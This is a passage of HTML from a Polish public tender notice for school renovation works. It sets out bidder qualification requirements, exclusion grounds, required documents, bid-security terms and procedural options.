zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-07-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">zdolności technicznej ( w zakresie doświadczenia)Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich pięciu latprzed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tymokresie, wykonał w sposób należytya) co najmniej dwa zadania , które polegały na budowie i/lub rozbudowie/przebudowie i/lub9remoncie budynków i wartości nie mniejszej niż 1.000.000,00 złotych (z podatkiem VAT)każda;UWAGA:Zamawiający uzna za spełniony warunek dot. zdolności technicznej ( w zakresie doświadczenia)również w przypadku, gdy zdolność techniczna wykazana przez Wykonawcę obejmuje szerszyzakres robót od wymaganego powyżej - Zamawiający wymaga, aby w wykazie robót (wgzałącznika Nr 5 do SIWZ) wyodrębnione zostały wartość i zakres wykonanych robót spełniającychwymagania ppkt 2, które Wykonawca wykonał w ramach innych wielozakresowych zadań;Jeżeli wartość zamówienia została określona w walutach innych niż PLN zamawiający przyjmujeśredni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu zakończenia realizacjirobót budowlanych - jeżeli w dniu zakończenia realizacji robót budowlanych NBP nie publikowałśredniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs walutypublikowany pierwszego dnia po dniu zakończenia realizacji robót budowlanych w którym zostanieon opublikowany.3) zdolności zawodowej (w zakresie personelu)Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje co najmniej:a) kierownik budowy - 1 osoba posiadająca ważne uprawnienia do wykonywania samodzielnychfunkcji w budownictwie w specjalności konstrukcyjno - budowlanej bez ograniczeń lubodpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniejobowiązujących przepisów, upoważniające do kierowania robotami konstrukcyjno -budowlanymi. Minimum trzyletnie doświadczenie zawodowe w pełnieniu funkcji kierownikabudowy/lub kierownika robót/ lub inspektora nadzoru.b) kierownik robót branży elektrycznej - 1 osoba posiadająca ważne uprawnienia dowykonywania samodzielnych funkcji w budownictwie w specjalności elektrycznej bezograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane napodstawie wcześniej obowiązujących przepisów. Minimum trzyletnie doświadczenie zawodowew pełnieniu funkcji kierownika budowy/lub kierownika robót/ lub inspektora nadzoru.c) kierownik robót branży sanitarnej - 1 osoba posiadająca ważne uprawnienia do wykonywaniasamodzielnych funkcji w budownictwie w specjalności sanitarnej bez ograniczeń lubodpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniejobowiązujących przepisów. Minimum trzyletnie doświadczenie zawodowe w pełnieniu funkcjikierownika budowy/lub kierownika robót/ lub inspektora nadzoru.UWAGA:Zamawiający dopuszcza łączenie uprawnień. Zamawiający określając wymogi w zakresieposiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane,które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające imuprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego orazKonfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawobudowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacjizawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania brakupodstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy pzp;b) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca niezalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływemterminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarłporozumienie z właściwym organem podatkowym w sprawie spłat tych należności wrazz ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawemzwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całościwykonania decyzji właściwego organu;c) zaświadczenia właściwej terenowo jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lubKasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego,że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne,wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innegodokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organemw sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególnościuzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatnościlub wstrzymanie w całości wykonania decyzji właściwego organu,</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia przez wykonawcę spełnienia warunków udziału w postępowaniu dotyczącychzdolności technicznej lub zawodowej zamawiający żąda dostarczenia następujących dokumentów:a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tymokresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzeczktórych roboty zostały wykonane wg załącznika nr 5, z załączeniem dowodów określających czyte roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy robotyzostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czymdowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzeczktórego roboty budowlane były wykonywane, a jeżeli z uzasadnionych przyczyn o obiektywnymcharakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty;b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególnościodpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania robotami budowlanymi,wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczeniai wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonanychprzez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wg załącznika nr6.;Uwaga: Dokumenty, o którym mowa pkt. 6.3. należy złożyć w oryginale lub kopii poświadczonejza zgodność z oryginałem.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Dokumenty i oświadczenia składane wraz z ofertą :1) Formularz oferty - wg załącznika nr 2 do SIWZ;2) Aktualne na dzień składania ofert oświadczenie , że na dzień składania ofert wykonawca spełnia warunkiudziału w postępowaniu - wg załącznika nr 3 do SIWZ;3) Aktualne na dzień składania ofert oświadczenie, że na dzień składania ofert wykonawca nie podlegawykluczeniu z postępowania - wg załącznika nr 4 do SIWZ;4) oryginał dokumentu wadium, a przypadku wniesienia wadium w pieniądzu dowód wniesienia wadium;5) Pełnomocnictwo, o ile umocowanie prawne do reprezentacji wykonawcy nie wynika z przepisów prawalub dokumentów rejestrowych.UWAGAa) Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawcanie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.b) Oświadczenie, o którym mowa w ppkt.2 i ppkt 3 niniejszego punktu SIWZ należy złożyćw oryginale.c) Pełnomocnictwa zgodnie z działem VI rozdział II ustawy z dnia 23 kwietnia 1964 r. - Kodekscywilny (Dz. U. z 2016 r. poz. 380 - tekst jednolity) winny być złożone w formie oryginału lub kopiipoświadczonej notarialnie.d) W przypadku, gdy wykonawca wykazując spełnianie warunków udziału, o których mowa w pkt 5.1SIWZ polega na zasobach innych podmiotów dokument potwierdzający, że wykonawca realizujączamówienie będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególnościprzedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobówna potrzeby realizacji zamówienia. Wg zasad opisanych w pkt. 6.4.W celu potwierdzenia braku podstaw wykluczenia wykonawcy z postępowania o udzielenie zamówieniana podstawie okoliczności, o których mowa w art. 24 ust. 1 pkt 23 ustawy pzp - oświadczenie wymaganeod każdego Wykonawcy, który złożył ofertę - przekazane Zamawiającemu bez wezwania w terminie 3dni od zamieszczenia na stronie internetowej www.bip.powiat-nowosolski.pl informacji , o którejmowa w art.86 ust.5 ustawy pzp :1) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej w rozumieniuustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2015 r., poz. 184,1618 i 1634) z Wykonawcami, którzy złożyli oferty w niniejszym postępowaniu wg załącznika nr 6do SIWZ oraz w przypadku przynależności do tej samej grupy kapitałowej, dokumenty lub informacjepotwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencjiw niniejszym postępowaniu;Poleganie na zasobach innych podmiotów1) Wykonawca może w celu potwierdzenia spełniania warunków, o których mowa w pkt. 5.1. ppkt 2)i ppkt 3 SIWZ w stosownych sytuacjach oraz w odniesieniu do przedmiotowego zamówienia, polegaćna zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innychpodmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.2) Zamawiający jednocześnie informuje, iż ,,stosowna sytuacja" o której mowa w ppkt. 1 niniejszegopunktu SIWZ wystąpi wyłącznie w przypadku kiedy:a) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów udowodnizamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tychpodmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mudo dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zobowiązanie musiwskazywać w szczególności:(i) zakres dostępnych wykonawcy zasobów innego podmiotu,(ii)sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniuzamówienia publicznego,(iii) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,(iv) czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziałuw postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,zrealizuje roboty budowlane, których wskazane zdolności dotycząUwaga: Zobowiązanie, o którym mowa powyżej należy złożyć w oryginale.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości1) CZĘŚĆ (ZADANIE) 1: 25.000,00 PLN (słownie: dwadzieścia pięć tysięcy PLN)2) CZĘŚĆ (ZADANIE) 2: 25.000,00 PLN (słownie: dwadzieścia pięć tysięcy PLN)18przed upływem terminu składania ofert.8.2 Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą.8.3 Wadium może być wniesione w jednej lub w kilku następujących formach:1) pieniądzu,2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tymże poręczenie kasy jest zawsze poręczeniem pieniężnym,3) gwarancjach bankowych,4) gwarancjach ubezpieczeniowych,5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz.1158z późn.zm.)Uwaga:W przypadku składania przez Wykonawcę wadium w formie gwarancji, powinna być ona sporządzonazgodnie z obowiązującym prawem i powinna zawierać następujące elementy:a) nazwa dającego zlecenie udzielenia gwarancji (wykonawcy), beneficjenta gwarancji(zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) orazwskazania ich siedzib;b) określenie wierzytelności, która ma być zabezpieczona gwarancją;c) kwotę gwarancji;d) termin ważności gwarancji;e) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającegow przypadkach określonych w art.46 ust.4a i 5 ustawy pzp i być bezwarunkowe, nieodwołalnei płatne na pierwsze pisemne żądanie Zamawiającego.8.4 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy ZamawiającegoWadium wnoszone w pieniądzu należy wpłacić przelewem na konto zamawiającego Bank Spółdzielczyw Kożuchowie, Oddział w Nowej Soli, nr konta 97 9673 0007 0000 0301 1468 0003 z dopiskiemz dopiskiem ,,wadium w postępowaniu przetargowym - Remont szkoły w ........ ,,/ w zależności odCZEŚCI (ZADANIA).8.5 W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadiumna rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę.8.6 Wniesienie wadium w innej, niż wskazanej w pkt. 8.3. formie będzie skutkować uznaniem iż ofertaWykonawcy nie jest właściwie zabezpieczona wadium, a Zamawiający będzie musiał wykluczyć takiegoWykonawcę z postępowania na podstawie art. 24 ust.2 pkt 2 ustawy pzp.8.7 Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym, które zwraca wrazz odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzyna rachunek bankowy wskazany przez wykonawcę.8.8 Termin wniesienia wadium w formie gotówki :1) za termin wniesienia wadium uznaje się datę wpływu na rachunek Zamawiającego;2) wadium pieniężne musi być zaksięgowane najpóźniej przed upływem terminu składania ofert,dlatego Wykonawca musi uwzględnić czas, aby wymagana kwota zdążyła wpłynąć na kontoZamawiającego (została zaksięgowana w banku na rzecz Zamawiającego).8.9 W przypadku wniesienia przez Wykonawcę wadium w formie określonej w pkt.8.3 ppkt 2) do ppkt 5)zobowiązany jest on załączyć oryginał właściwego dokumentu poręczenia lub gwarancji do złożonejoferty.8.10 Zgodnie z art. 24 ust. 2 pkt 2) Wykonawcę, który nie wniósł wadium w wyznaczonym terminiewyklucza się z postępowania.8.11 Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium napodstawie art.46 ust.1 ustawy pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostaławybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przezZamawiającego.198.12 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, októrym mowa w art. 26 ust. 3 ustawy pzp, z przyczyn leżących po jego stronie, nie złożył dokumentówlub oświadczeń, o których mowa w art. 25 ust. 1 ustawy pzp, pełnomocnictw, listy podmiotównależących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy pzp, lubinformacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki,o której mowa w art. 87 ust. 2 pkt 3 ustawy pzp, co powodowało brak możliwości wybrania ofertyzłożonej przez Wykonawcę jako najkorzystniejszej8.13 Zamawiający w oparciu o art.46 ust.5 ustawy pzp zatrzymuje wadium wraz z odsetkami, jeżeliwykonawca , którego oferta została wybrana :1) odmówił podpisania umowy na warunkach określonych w ofercie ;2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy ;3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących postronie Wykonawcy .8.14 Zamawiający zwróci wadium:a) wszystkim Wykonawcom, niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniupostępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zzastrzeżeniem pkt.8.12 ;b) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciuumowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonaniaumowy.8.15 Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymiz umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o kosztyprowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowywskazany przez Wykonawcę.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE 